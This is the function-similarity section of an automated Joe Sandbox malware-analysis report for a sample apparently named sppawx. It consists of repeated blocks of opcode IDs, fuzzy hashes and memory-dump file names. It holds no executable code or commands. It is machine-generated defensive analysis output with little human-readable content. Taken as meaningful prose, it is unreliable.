                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                              • Instruction ID: 70cde16c6354260bed8945666f812a85cefe6f91883204bfa7a877ddda293957
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0B09220E0BA02C2FE193B35BC8621872A47F48700FD942BCC41C80330DE2C20E55720
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                              • Instruction ID: 747f82c16d7d13d055572ca166d67a16aa5b5f5154a87fb9a44916b9d1925431
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03D1E366A0A64286FB78AE39805023DB7A0FF05B68F96427DCE4D07794CF3DE845C760
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                              • Instruction ID: cf12e50eed22c5d683bda6877ba805cba13f9fde779cc89651051e6216f04539
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AC1AD762181E08BE299EA29E4694BA73D1F78930DBD5406FEF8747685C63CA414DB20
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                              • Instruction ID: fb418bd33a84f47e43e1c84d4d943e65590bae271d2ab7ee18078163d929cf38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FB19932A0A78589FBB49F7A885022CBBA4E709B48FA4017ECE4E47395CF29D451D760
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                              • Instruction ID: a1680bba35acd47014aa6668d2f30a27f095ee79039f0b530a91b8cf7525da2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B81D472A0978146F7B4DF29944237ABE91FB45798FA4427DDE8D43B95DE3CD4008B10
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                              • Instruction ID: b5ba68e7e605aa953167356586af2ef34e425f88a1aaec1ec02921cdabd10c8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7861E922E0F2924EFB7CAA39845467EF580AF417A0FD482BDDA1D466D5DF7DE8408720
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                              • Instruction ID: f8c3fa21a9e5d4ff3e1424cabc9d440e5ca1350828e38f365553b82dd11fdc04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47519136A1A65186FB349B39C140239B7B0EB48F68FA4417DCE8D17794DB3AE843C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                              • Instruction ID: 600586b0d254e3a5b626896ce6f7f4695b4d7507985402837e5d62aeae3d32a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19518032A1A65186F7B49B7AD440238B3A0EB54B68F64427DDE8C177D4CB3BE853C750
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                              • Instruction ID: d6c8d67a7b687154161b5f86c6343addb20dde05226fe4f69bfe0d582f8ef81b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E51B476A1A65282FB749B39D540239B3A0EB48F68F64427DCE4C07794CB3AEC43C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                              • Instruction ID: 5959495a68367a2e149b6d3595e93491277f0b37bff867042a3a1bc2e616da06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4451A376A1966186FB349B39C140238B7A1EB85B58FA4417DCE4C177A8CB3AE883C750
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                              • Instruction ID: 257d949fb315416a5c83e1d5034e4a5e0c5d4fa4bd3838cb8b00ff841cc2f936
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB519C36A1A65186FB749B39D18023CB7A1EB44F58FA4517DCE4C177A8CB3AE842C790
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                              • Instruction ID: 160c9809ff5220aaa94b2432a6141fba5b28e9361a20b111bad3e340a5ea406d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851E332A1A65185F7B49B7AC840679B7A0EB48B58FA4807DCE4C177A4DF3AEC42C750
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                              • Instruction ID: febe35841626d181b0f5300e621c22e86093d071466503cc9a011568746f7041
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3441A9B2C0B78AA4F975993809046F8F6809F72BA0DD862FDDD9953BC3DD0C6B468121
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                              • Instruction ID: 2eaea45fc05b31066398d85c45d8b3787a971ac5d3b433d6cb2aac813ed641f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0341E122B25A5582FF14DF7ADA141A9F3A1BB48FD4B89D43ADE0D97B58DE3CD4418300
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                              • Instruction ID: a8dcd738786b8002831cfdaec4ca99354bf79da42eabf13a7e590dcbcdc96216
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31A032A0AB4282F774AB36A84013EB695AB85B90F94427DEE5D53BD5DF3CE0028314
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                              • Instruction ID: ef1fdc203c6a95ebffaaff02d738b6aa26a21f5f6b9cc415b831f0078d58c463
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F06871B192558AEBA89F7DE4126297BD0F7083C0FC0A07DE58D83B14DA3CD0618F14
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                              • Instruction ID: 7366c29fb6501a3eb737bab81dc6d5e93695bc01f9e0f622386c062f22dc20c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFA0012190E81AD0F668AB20E894125B320FB51340BC045BDF00E810A09F6CA4009220
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
